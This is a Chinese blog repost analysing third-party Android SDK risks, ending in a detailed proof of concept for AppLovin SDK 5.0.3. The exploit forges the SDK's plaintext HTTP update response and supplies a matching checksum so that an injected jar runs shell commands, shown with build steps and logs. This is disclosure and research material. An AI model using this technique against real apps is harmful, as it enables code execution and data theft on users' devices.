SDK安全分析 - bamb00

标签: sdk 安全 分析 | 发表时间:2015-08-06 16:29 | 作者:bamb00
出处:

  第三方sdk的包括广告、支付、统计、社交、推送,地图等类别,是广告商、支付公司、社交、推送平台,地图服务商等第三方服务公司为了便于应用开发人员使用其提供的服务而开发的工具包,封装了一些复杂的逻辑实现以及请求,响应解析的API,由于其使用的广泛性,一旦出现安全问题并且被黑客利用,其影响范围之广,危害之大不言而喻。

    SDK的安全问题

       首先,一些恶意的Sdk本身会存在着安全威胁,除了众所周知的获取用户隐私信息,如收集设备id(IMEI,IMSI等)、获取用户位置信息外,还存在着更严重的安全问题。比如某些sdk具有主动接收服务器指令的功能,它会根据需要收集短信、通话记录和联系人等敏感信息。另外,它还会执行如动态下载代码等危险操作。

  其次,Sdk自身可能还会存在漏洞。如果这些漏洞被利用,攻击者就能够利用sdk本身存在的强大功能发动恶意的攻击行为,例如在用户毫无察觉的情况下打开相机拍照,通过发送短信盗取双因素认证令牌,或将设备变成僵尸网络的一部分。

下面介绍下目前在第三方sdk(主要是指广告sdk)中发现的恶意行为和漏洞。

恶意行为

  • 收集用于定位和追踪用户的信息,如设备id和位置信息,
  • 收集用户的邮箱地址以及安装在用户设备上的应用程序列表。
  • 读取短信、邮件、电话通话记录和联系人列表,在没有任何访问控制措施的情况下通过web服务公开共享这些数据。
  • 接收远程服务器指令,下载任意代码并执行。
  • 数据明文传输

漏洞

  • 通过明文传输数据

  通过HTTP明文传输用户的隐私信息,使隐私信息很容易被窃取。FireEye 的研究者声称在Google Play的主流应用中有47%的广告sdk存在该漏洞。

  • 使用HTTP协议传输数据

使用不安全的HTTP协议从控制服务器接收命令或者动态加载代码。攻击者可以通过中间人攻击,劫持HTTP数据包,冒充服务器下发恶意指令、推送恶意代码,将第三方sdk变成一个僵尸网络。

       攻击者有许多方法来利用sdk的漏洞。比如劫持公共WiFi:当受害者的设备连接到公共WiFi热点(在咖啡店或机场等),攻击者可以在附近监听AppLovin广告sdk的数据包、注入恶意指令和代码。

       攻击者也可以通过DNS劫持的方式来达到利用漏洞的目的。在DNS劫持攻击中,攻击者可以修改sdk广告服务器的DNS记录,把访问者重定向到攻击者自己的控制服务器,以便从受害者设备上收集隐私信息或者发送恶意控制指令到受害者设备上。

  • Webview漏洞

       WebView相当于一个浏览器窗口,应用程序可以使用它来显示网页内容。addJavascriptInterface这个API允许运行在WebView中的JavaScript代码来访问应用的native功能。攻击者可以利用此漏洞,使用应用已有的权限,通过恶意的JavaScript代码来对设备进行恶意操作。这个漏洞已经影响到超过90%的Android设备了。

       为了降低安全风险,从Android 4.2开始,谷歌增加了一个叫做@JavascriptInterface的注解,开发人员可以使用它来定义需要暴露给WebView中的JavaScript代码的函数。这实质上是一个白名单机制,让开发者决定什么函数是允许被调用的。

       然而添加 @JavascriptInterface注解只是在理论上降低了风险,其实际效用依赖于开发者如何使用它。另外,开发人员还可以添加代码,以便JavaScript调用任何应用暴露出来的函数(触发这些行为)都需要获得用户的许可。

  • 使用动态加载的方式进行升级

采用运行时动态加载技术在Dalvik虚拟机中动态执行代码作为其升级机制的一部分,却没有对动态加载的代码进行校验。如果该部分代码被黑客恶意篡改,则会给用户造成严重的安全威胁。

       有些sdk本身具有危险行为,同时又存在漏洞,这种特性我们称之为“vulnaggressive”。这种特性并不局限于广告sdk,其它第三方组件和应用程序也存在。如果一个sdk具有“vulnaggressive”特性,则会使Android用户,尤其是企业用户面临严重的安全威胁。AppLovin广告sdk就是一个实例。

    AppLovin的恶意威胁

       AppLovin广告sdk的恶意行为表现在收集用户的敏感数据,嵌入了按需执行危险操作的功能,该sdk本身存在着严重的漏洞,使应用容易遭受攻击者入侵。攻击者利用sdk的漏洞,同时利用sdk本身的恶意行为,攻击者可以在用户的设备上下载并执行任意代码。然而使用这些第三方sdk的应用开发人员往往不知道其中存在的安全风险,从而给企业用户造成严重威胁。

       在我们的研究中发现,许多包含AppLovin广告sdk的Android应用具有强大的权限,它们可以控制摄像机;读写短信、历史通话记录、联系人、浏览器历史记录和书签;并在桌面上创建快捷方式。

       攻击者可以利用这些权限进行恶意操作。比如:

  • 通过短信窃取双因素认证令牌
  • 在SD卡上查看照片和其他文件
  • 在桌面上安装图标用于钓鱼攻击
  • 删除文件和销毁历史数据
  • 冒充老板发送伪造的业务短信给商业伙伴
  • 在没有通知用户的情况下删除接收到的短信
  • 拨打电话
  • 在没有通知用户的情况下使用相机拍照
  • 读取书签或者将它们指向钓鱼网站

       尽管AppLovin广告sdk造成了严重的威胁,但因其具有隐蔽性,所以更加防不胜防:

  • AppLovin广告sdk通过HTTP头字段的数据编码,而不是HTTP响应体从广告服务器接收命令。
  • AppLovin广告sdk的代码被混淆,这使得使用传统的分析方法变得困难。
  • AppLovin广告sdk的行为难以用传统的分析方法来触发。例如,在一种流行的游戏中,AppLovin广告sdk仅在游戏中某些点执行,比如说达到游戏中的特定级别。当AppLovin广告sdk执行的时候,用户可见的唯一影响是在屏幕顶部的广告(如下图所示)。然而,AppLovin广告sdk却在背后悄悄执行其危险行为。

  

AppLovin广告sdk的屏幕截图

 

AppLovin漏洞剖析

       AppLovin广告sdk5.0.3版本的升级机制存在远程代码执行漏洞。该广告sdk采用运行时动态加载技术在Dalvik虚拟机中动态执行代码作为其升级机制的一部分。

       该广告sdk会定期的通过http协议以明文方式与d.applovin.com进行数据传输。发送以下请求:

1 GET /sdk/android?interface=5.0.0&implementation=5.0.3 HTTP/1.1
2 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.3; sdk Build/JWR66V)
3 Host: d.applovin.com
4 Connection: Keep-Alive
5 Accept-Encoding: gzip

然后服务端将进行响应,如果有更新,就把一个包含了要更新的sdk的jar文件下载到应用目录下一个叫“app_al_sdk”的文件夹中:

/data/data/<vulnerable application>/app_al_sdk/<SDK version>.jar

当应用再次运行的时候,AppLovin广告library就会 检测这个目录下是否存在更新的 jar ,如果存在则将该jar包中的dex文件解压出来替换/data/data/<vulnerable application>/al_outdex文件,这样dex中的com.applovin.impl.bootstrap.SdkBoostrapTasksImpl类就会被动态加载,其中的startUpdateDownload方法也将会被调用。

从源代码可以得知,当一个包含AppLovin广告sdk的应用启动后,一个‘boot’进程就会启动(由于反编译的关系,也可能是‘bootstrap’进程、‘boostrap’进程)。如下所示,com.applovin.impl.bootstrap包中的UpdateSDK类负责发送更新请求和处理服务器响应:

1 package com.applovin.impl.bootstrap;
2
3 ..
4
5 ..
6
7 class UpdateSDK extends Thread {
8
9 private final Context b;
10
11 public UpdateSDK(SdkBoostrapTasksImpl arg2, Context arg3) {
12
13 this.a = arg2;
14
15 super();
16
17 this.b = arg3;
18
19 this.setName("AppLovinUpdateThread");
20
21 }
22
23 public void run() {
24
25 SharedPreferences$Editor v0_3;
26
27 String SdkUpdateinterval;
28
29 int ResponseCode;
30
31 StringBuffer uri;
32
33 SharedPreferences BootstrapSettings = this.b.getSharedPreferences("applovin.sdk.boostrap", 0);
34
35 String CheckSum = BootstrapSettings.getString("version", "");
36
37 if(CheckSum == null || CheckSum.length() < 1) {
38
39 CheckSum = "5.0.3";
40
41 }
42
43 InputStream ResponseStream = null;
44
45 try {
46
47 SdkBoostrapTasksImpl.a(this.a, "Checking for an update for the SDK interface: 5.0.0, implementation: "
48
49 + CheckSum + "...");
50
51 uri = new StringBuffer(GetUpdateUri.a(this.b));
52
53 uri.append("?").append("interface").append("=").append("5.0.0"); // ?interface=5.0.0
54
55 uri.append("&").append("implementation").append("=").append(CheckSum); // ?interface=5.0.0&implementation=5.0.3
56
57 URLConnection RequestObject = new URL(uri.toString()).openConnection();
58
59 ((HttpURLConnection)RequestObject).setRequestMethod("GET");
60
61 ((HttpURLConnection)RequestObject).setConnectTimeout(20000);
62
63 ((HttpURLConnection)RequestObject).setReadTimeout(20000);
64
65 ((HttpURLConnection)RequestObject).setDefaultUseCaches(false);
66
67 ((HttpURLConnection)RequestObject).setAllowUserInteraction(false);
68
69 ((HttpURLConnection)RequestObject).setUseCaches(false);
70
71 ((HttpURLConnection)RequestObject).setInstanceFollowRedirects(true);
72
73 ((HttpURLConnection)RequestObject).setDoInput(true);
74
75 ResponseCode = ((HttpURLConnection)RequestObject).getResponseCode();
76
77 String SDKFileName = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Implementation"); // filename?
78
79 String SdkImpCheckSum = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Implementation-Checksum");
80
81 SdkUpdateinterval = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Sdk-Update-Interval");
82
83 String AppLovinEventID = ((HttpURLConnection)RequestObject).getHeaderField("AppLovin-Event-ID");
84
85 SdkBoostrapTasksImpl.a(this.a, "Auto-update info: {code: " + ResponseCode + ", " + "eventId: "
86
87 + AppLovinEventID + ", " + "fileName: " + SDKFileName + ", " + "checksum: " + SdkImpCheckSum
88
89 + ", " + "interval: " + SdkUpdateinterval + "}");
90
91 if(ResponseCode == 200) {
92
93 if(SDKFileName != null && SDKFileName.length() > 0) {
94
95 File SdkUpdateFile = new File(this.b.getDir("al_sdk", 0), SDKFileName);
96
97 ResponseStream = ((HttpURLConnection)RequestObject).getInputStream();
98
99 CheckSum = SdkBoostrapTasksImpl.a(ResponseStream, SdkUpdateFile);
100
101 if(CheckSum != null && (CheckSum.equals(SdkImpCheckSum))) {
102
103 SharedPreferences$Editor v3_2 = BootstrapSettings.edit();
104
105 v3_2.putString("version", SDKFileName);
106
107 v3_2.putString("interface", "5.0.0");
108
109 v3_2.putString("ServerEventId", AppLovinEventID);
110
111 v3_2.putString("ServerChecksum", CheckSum);
112
113 v3_2.commit();
114
115 SdkBoostrapTasksImpl.a(this.a, "New update processed: " + SDKFileName);
116
117 goto label_130;
118
119 }
120
121 SdkBoostrapTasksImpl.a(this.a, "SDK update checksum does not match. Expected " +
122
123 SdkImpCheckSum + ", but got " + CheckSum);
124
125 goto label_130;
126
127 }
128
129 SdkBoostrapTasksImpl.a(this.a, "Unable to receive SDK update: " + uri + " has not returend a file name");
130
131 }

上述代码从"applovin.sdk.boostrap"配置文件中读取一个版本号作为checksum,然后构造和发送以下请求:

1 GET /sdk/android?interface=5.0.0&implementation=5.0.3 HTTP/1.1
2 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.3; sdk Build/JWR66V)
3 Host: d.applovin.com
4 Connection: Keep-Alive
5 Accept-Encoding: gzip

然后对接收到的以下服务器响应信息进行处理:

1 HTTP/1.1 200
2
3 Server: nginx
4
5 Date: Mon, 21 Oct 2013 19:31:20 GMT
6
7 Content-Type: text/html
8
9 Connection: keep-alive
10
11 Vary: Accept-Encoding
12
13 Cache-Control: no-store, no-cache, must-revalidate
14
15 AppLovin-Sdk-Update-Interval: 10
16
17 AppLovin-Sdk-Next-Update-Time: 10
18
19 AppLovin-Sdk-Implementation: 5.0.3.jar
20
21 AppLovin-Sdk-Implementation-Checksum: a9e5f7c98ab3f1dc9ecab25f15ef09e25d5bce28
22
23 AppLovin-Event-ID: 123456
24
25 Content-Length: 1660

  服务器会返回以上的响应信息,这些数据被写入到一个文件(文件名为AppLovin-Sdk-Implementation头的值,实际为一个jar包)中,同时会产生一个SHA1 哈希值与AppLovin-Sdk-Implementation-Checksum头的值进行匹配。响应头中其它信息如 AppLovin-Sdk-Update-Interval头 和 AppLovin-Sdk-Next-Update-Time头被写入到一个配置文件中以控制下次应用的更新时间间隔。

       当应用再次启动时bootstrap进程初始化的流程就不同了。这个时候com.applovin.sdk.bootstrap包中的SdkBootstrap 类会从配置文件中读取这些值,如果发现这些值不匹配则不会通过控制器去启动更新机制。否则就去检查app_al_sdk目录下是否存在jar文件并与配置文件中的版本值相匹配,匹配则将jar包中的classess.dex文件解压到app_al_outdex文件夹中。

1 package com.applovin.sdk.bootstrap;
2
3 ..
4
5 ..
6
7 public class SdkBootstrap {
8
9 ..
10
11 ..
12
13 private void BootstrapSdkClassLoaderInit(Context AppContext) {
14
15 this.VerboseLogging = AppLovinSdkUtils.isVerboseLoggingEnabled(AppContext);
16
17 SharedPreferences bootstrapPref = AppContext.getSharedPreferences("applovin.sdk.boostrap", 0
18
19 );
20
21 String versionVal = bootstrapPref.getString("version", "");
22
23 String interfaceVal = bootstrapPref.getString("interface", "");
24
25 if(versionVal.length() <= 0 || !"5.0.0".equals(interfaceVal)) {
26
27 this.disable();
28
29 }
30
31 else {
32
33 File FileNameParam1 = new File(AppContext.getDir("al_sdk", 0), versionVal);
34
35 if((FileNameParam1.exists()) && FileNameParam1.length() > 0) {
36
37 this.ThisClassLoader = new SdkClassLoader(FileNameParam1, AppContext.getDir("al_outdex"
38
39 , 0), SdkBootstrap.class.getClassLoader());
40
41 goto checkForUpdates;
42
43 }
44
45 this.Log_("SDK implementation file " + versionVal + " has no content, using default implementation"
46
47 );
48
49 this.disable();
50
51 }
52
53 ..
54
55 ..

在com.applovin.sdk.bootstrap.SdkClassLoader类中SdkClassLoader 方法被调用:

1 package com.applovin.sdk.bootstrap;
2
3 ..
4
5 ..
6
7 public class SdkClassLoader extends DexClassLoader {
8
9 public SdkClassLoader(File FileNameParam, File DirectoryNameParam, ClassLoader ClassLoaderObject
10
11 ) {
12
13 super(FileNameParam.getAbsolutePath(), DirectoryNameParam.getAbsolutePath(), null, ClassLoaderObject
14
15 );
16
17 }
18
19 ..
20
21 ..

类加载器对象加载classes.dex,并作为参数从checkForUpdates方法中传递到loadImplementation方法中:

1 package com.applovin.sdk.bootstrap;
2
3 ..
4
5 ..
6
7 public class SdkBootstrap {
8
9 ..
10
11 ..
12
13 public void checkForUpdates()
14
15 {
16
17 if (AppLovinSdkUtils.isAutoUpdateEnabled(this.d))
18
19 {
20
21 SdkBoostrapTasks localSdkBoostrapTasks = (SdkBoostrapTasks)loadImplementation(SdkBoostrapTasks.class);
22
23 if (localSdkBoostrapTasks != null)
24
25 localSdkBoostrapTasks.startUpdateDownload(this.d.getApplicationContext());
26
27 }
28
29 }

loadImplementation 方法如下:

1 package com.applovin.impl.bootstrap;
2
3 ..
4
5 ..
6
7 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
8
9 ..
10
11 ..
12
13 try
14
15 {
16
17 String str1 = paramClass.getSimpleName();
18
19 String str2 = paramClass.getPackage().getName();
20
21 String str3 = str2.substring(1 + str2.lastIndexOf('.'));
22
23 String str4 = "com.applovin.impl." + str3 + "." + str1 + "Impl";
24
25 a("Loading " + str4 + "...");
26
27 Object localObject = paramClass.cast(this.e.loadClass(str4).newInstance());
28
29 return localObject;
30
31 }

这个方法从提供的classes.dex文件中加载com.applovin.impl.bootstrap.SdkBoostrapTasksImpl类并且返回一个对象(即localSdkBoostrapTasks)给checkForUpdates方法,checkForUpdates方法再通过返回的这个对象调用startUpdateDownload方法。

1 public void checkForUpdates()
2
3 {
4
5 if (AppLovinSdkUtils.isAutoUpdateEnabled(this.d))
6
7 {
8
9 SdkBoostrapTasks localSdkBoostrapTasks = (SdkBoostrapTasks)loadImplementation(SdkBoostrapTasks.class);
10
11 if (localSdkBoostrapTasks != null)
12
13 localSdkBoostrapTasks.startUpdateDownload(this.d.getApplicationContext());
14
15 }
16
17 }

SdkBoostrapTasksImpl 类中startUpdateDownload 方法原型如下:

1 package com.applovin.impl.bootstrap;
2
3 ..
4
5 ..
6
7 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
8
9 ..
10
11 ..
12
13 public void startUpdateDownload(Context paramContext)
14
15 {
16
17 this.a = AppLovinSdkUtils.isVerboseLoggingEnabled(paramContext);
18
19 SharedPreferences localSharedPreferences = paramContext.getSharedPreferences("applovin.sdk.boostrap", 0);
20
21 long l1 = System.currentTimeMillis();
22
23 long l2 = localSharedPreferences.getLong("NextAutoupdateTime", 0L);
24
25 if ((l2 == 0L) || (l1 > l2))
26
27 new b(this, paramContext).start();
28
29 }

攻击者可以通过 重新实现 com.applovin.impl.bootstrap.SdkBoostrapTasksImpl 类中的startUpdateDownload  方法构造一个恶意的sdk更新。为了达到这个目的,需要对包含有漏洞的AppLovin sdk应用进行反编译。

$ unzip VulnerableApp.apk

利用dex2jar将解压后得到的classes.dex文件反编译成jar包:

$ dex2jar.sh classes.dex

创建一个eclipse工程,将工程Properties设置为“Is Library”(在工程右击-properties-Android最下面,有个Is library,选择后-apply确定,表示此工程可以公开给别的工程使用),然后将上一步得到的classes_dex2jar.jar文件复制到lib目录下。

$ cp classes-dex2jar.jar ~/eclipse-workspace/MWRAppLovin/libs/

接下来创建com.applovin.impl.bootstrap包和SdkBoostrapTasksImpl类,PoC如下:

1 package com.applovin.impl.bootstrap;
2
3 import java.io.BufferedWriter;
4
5 import java.io.IOException;
6
7 import java.io.OutputStreamWriter;
8
9 import android.content.Context;
10
11 import android.os.Environment;
12
13 import android.util.Log;
14
15 import com.applovin.sdk.bootstrap.SdkBoostrapTasks;
16
17 public class SdkBoostrapTasksImpl implements SdkBoostrapTasks {
18
19 public SdkBoostrapTasksImpl() {
20
21 super();
22
23 }
24
25 @Override
26
27 public void startUpdateDownload(Context AppContextParam) {
28
29 AppContextParam.getApplicationContext();
30
31 Log.i("[mwr]", "startUpdateDownload — running our injected code");
32
33 String path = Environment.getExternalStorageDirectory().getPath();
34
35 String[] commands = {
36
37 "echo -e \"--[mwr]--\" > " + path + "/mwr.txt\n",
38
39 "id >> " + path + "/mwr.txt\n"
40
41 };
42
43 execCommands(commands);
44
45 }
46
47 public Boolean execCommands(String... command) {
48
49 Runtime rtime = Runtime.getRuntime();
50
51 Process child = null;
52
53 try {
54
55 child = rtime.exec("/system/bin/sh");
56
57 } catch (IOException e1) {
58
59 }
60
61 BufferedWriter outCommand = new BufferedWriter(new OutputStreamWriter(child.getOutputStream()));
62
63 try {
64
65 for(int i = 0; i < command.length; i++) {
66
67 Log.i("[mwr]", "execCommands — executing " + command[i]);
68
69 outCommand.write(command[i]);
70
71 outCommand.flush();
72
73 }
74
75 } catch (IOException e) {
76
77 }
78
79 return true;
80
81 }
82
83 }

上面的PoC会将当前用户id写入sd卡的mwr.txt文件中。如果这个lib库已经被编译成jar包,则必须用dx将其重打包为dex。

$ dx --dex --output=mwr_applovin_sdk.jar mwrapplovin.jar

(注:dx --dex --output=target.jar origin.jar  首先将origin.jar编译成origin.dex文件(Android虚拟机认识的字节码文件),然后再将origin.dex文件压缩成target.jar)

然后攻击者需要伪造服务器对客户端更新请求的响应并且发送恶意sdk更新,同时需要生成恶意jar包的checksum(sha1哈希):

$ shasum mwr_applovin_sdk.jar

860b438285557693a30a89874df5c26a6fadfb92

一个伪造的响应如下所示:

1 HTTP/1.1 200
2
3 Server: nginx
4
5 Date: Mon, 21 Oct 2013 19:31:20 GMT
6
7 Content-Type: text/html
8
9 Connection: keep-alive
10
11 Vary: Accept-Encoding
12
13 Cache-Control: no-store, no-cache, must-revalidate
14
15 AppLovin-Sdk-Update-Interval: 1000
16
17 AppLovin-Sdk-Next-Update-Time: 1000
18
19 AppLovin-Sdk-Implementation: mwr_applovin_sdk.jar
20
21 AppLovin-Sdk-Implementation-Checksum: 860b438285557693a30a89874df5c26a6fadfb92
22
23 AppLovin-Event-ID: 123456
24
25 Content-Length: 1660
26
27 <BINARY DATA>

用logcat查看广告插件的日志信息,从相关event可知恶意jar文件已经被下载:

1 I/AppLovinSdk( 742): [Boostrap] Auto-update info: {code: 200, eventId: 123456, fileName: mwr_applovin_sdk.jar, checksum: 860b438285557693a30a89874df5c26a6fadfb92, interval: 10}
2
3 I/AppLovinSdk( 742): [Boostrap] New update processed: mwr_applovin_sdk.jar
4
5 I/AppLovinSdk( 742): [Boostrap] Next update is at: "1382624665463"

下述log信息表明当应用再次启动的时候,从jar包中释放出了dex文件并且恶意代码已经执行:

1 /dalvikvm( 3280): DexOpt: --- BEGIN 'mwr_applovin_sdk.jar' (bootstrap=0) ---
2
3 D/dalvikvm( 2949): GC_FOR_ALLOC freed 0K, 3% free 56131K/57696K, paused 156ms, total 156ms
4
5 D/dalvikvm( 3398): DexOpt: load 41ms, verify+opt 15ms, 80116 bytes
6
7 D/dalvikvm( 3280): DexOpt: --- END 'mwr_applovin_sdk.jar' (success) ---
8
9 D/dalvikvm( 3280): DEX prep '/data/data/<vulnerable app>/app_al_sdk/mwr_applovin_sdk.jar': unzip in 0ms, rewrite 286ms
10
11 I/AppLovinSdk( 3280): [Boostrap] Loading com.applovin.impl.bootstrap.SdkBoostrapTasksImpl...
12
13 D/AppLovinSdk( 3280): Loading SDK implementation class: com.applovin.impl.bootstrap.SdkBoostrapTasksImpl
14
15 I/[mwr] ( 3280): startUpdateDownload — running our injected code
16
17 I/[mwr] ( 3280): execCommands — executing echo -e "--[mwr]--" >> /mnt/sdcard/mwr.txt
18
19 I/[mwr] ( 3280): execCommands — executing id >> /mnt/sdcard/mwr.txt

adb命令表明执行很成功:

1 $ adb shell
2
3 root@generic:/ # cat /mnt/sdcard/mwr.txt
4
5 --[mwr]--
6
7 uid=10048(u0_a48) gid=10048(u0_a48) groups=1006(camera),1015(sdcard_rw),1028(sdcard_r),3003(inet),50048(all_a48)

参考资料:

http://www.pcworld.com/article/2093460/mobile-users-at-risk-from-lack-of-https-use-by-mobile-ad-libraries-security-researchers-say.html

https://www.fireeye.com/blog/threat-research/2013/10/ad-vulna-a-vulnaggressive-vulnerable-aggressive-adware-threatening-millions.html

https://labs.mwrinfosecurity.com/blog/2013/11/20/applovin-ad-library-sdk-remote-command-execution-via-update-mechanism/


本文链接: SDK安全分析,转载请注明。

相关 [sdk 安全 分析] 推荐:

SDK安全分析 - bamb00

- - 博客园_首页
  第三方sdk的包括广告、支付、统计、社交、推送,地图等类别,是广告商、支付公司、社交、推送平台,地图服务商等第三方服务公司为了便于应用开发人员使用其提供的服务而开发的工具包,封装了一些复杂的逻辑实现以及请求,响应解析的API,由于其使用的广泛性,一旦出现安全问题并且被黑客利用,其影响范围之广,危害之大不言而喻.

分析聚合数据的SDK

- - Solidot
Aveline Swan上周发现聚合数据(juhe.cn)的 SDK会偷偷上传用户通讯录至服务器,虽然聚合数据随后更新了SDK关闭了上传用户通讯录,但Swan指出在产品端更新SDK是个漫长的过程,旧版的SDK仍然在收集用户通讯录,而且合数据服务器上用于接收上传的通讯录的接口并没有被删掉,仍然能正常处理数据.

技术篇:央视事件中移动广告公司的SDK简单分析

- - 雷锋网
早上一来微博就看到一篇报道,央视爆移动广告行业获取用户隐私信息,有米、哇棒、赢告榜上有名. 开头看着是好奇,移动广告行业才2,3年时间,比起其他成熟的广告方式,能得到央视关注的机会着实不多. 接着便是好笑又有点无奈,正如微博上有些业内人士说的:媒体对行业了解不深,销售人员出于销售天性,夸大其词,结果是“一拍即合”,让媒体理所当然地得出移动广告严重侵犯用户私隐的结论.

ミログがAndroidアプリ開発者向けにアプリ分析のSDKを提供。medibaと提携でターゲティング広告も

- 三十不归 - TechCrunch Japan
どのAndroidアプリを友人がインストールしているか互いに情報をシェアするアプリ、FriendAppを開発するミログについては以前に紹介している. FriendAppをインストールするとFriendAppはAndroid端末にインストールされているアプリの情報やアプリの起動回数などのデータを集めてくるようになっているのだが、これはFriendApp自体が広がらないと、収集できる端末の数が増えない.

Goolge发布Chromecast SDK

- - Chrome迷
自从有了Chromecast,用户把各种自己喜爱的在线内容投放到电视屏幕上变得非常方便,投放过程简单得只需要用户按下手机、平板和笔记本上的投放按钮. 今日,为了让内容更容易地被呈现到电视上,Google发布了Chromecast软件开发套件(SDK),开发者们可以在自己的应用和网站上提供Chromecast接入.

微软发布Kinect SDK For Windows

- skyan - Solidot
微软遵守承诺发布了Kinect SDK For Windows,允许教育研究人员或爱好者为这种体感控制器开发新的应用. SDK是基于XBOX 360上使用的软件,但微软将其移植到了.NET平台,支持C#、VB.NET或C++.NET等开发语言. Kinect SDK For Windows的运行平台是Windows 7,最低硬件需求是4GB RAM、双核处理器和DirectX 9.0c显卡,开发工具是Visual Studio 2010 Express(免费版),.NET Framework 4.0.

Kinect for Windows SDK出炉了

- 杯子 - 增强视觉 | 计算机视觉 增强现实
官方首页:http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/default.aspx. 微软从PrimeSense买来Kinect硬件加上来自Andrew Blake 带领的MSR剑桥视觉组的算法,让微软在本已经热卖的XBox360上又大赚了一大笔.

Kinect for Windows SDK 本周发布

- 王辉 - LiveSino - LiveSide 中文版
微软在 MIX 11 大会上宣布了 Kinect for Windows SDK,也演示了相关的开发和应用,但始终未提供 Beta 版 SDK 的下载. 微软西班牙总裁 María Garaña 周三披露微软计划本周发布 Kinect for Windows SDK Beta. 根据微软研究院网站,Kinect for Windows SDK 包括:.

GAE SDK 1.5.5 版发布

- Ken - python.cn(jobs, news)
本想睡觉了,突然看到GAE SDK 1.5.5版发布了,于是就再坚持一下,写完本文吧. 这个版本最重要的更新就是支持Python 2.7了. 关于Python 2.7的新功能,可以查看《What's New in Python 2.7》这篇文档. 在app.yaml中设置threadsafe: true即可启用,必须使用WSGI接口(直接在app.yaml里设置WSGI application对象的路径,而非Python文件).

GAE SDK 1.5.5版发布

- f41c0n - keakon的涂鸦馆
本想睡觉了,突然看到GAE SDK 1.5.5版发布了,于是就再坚持一下,写完本文吧. 这个版本最重要的更新就是支持Python 2.7了. 关于Python 2.7的新功能,可以查看《What's New in Python 2.7》这篇文档. 在app.yaml中设置threadsafe: true即可启用,必须使用WSGI接口(直接在app.yaml里设置WSGI application对象的路径,而非Python文件).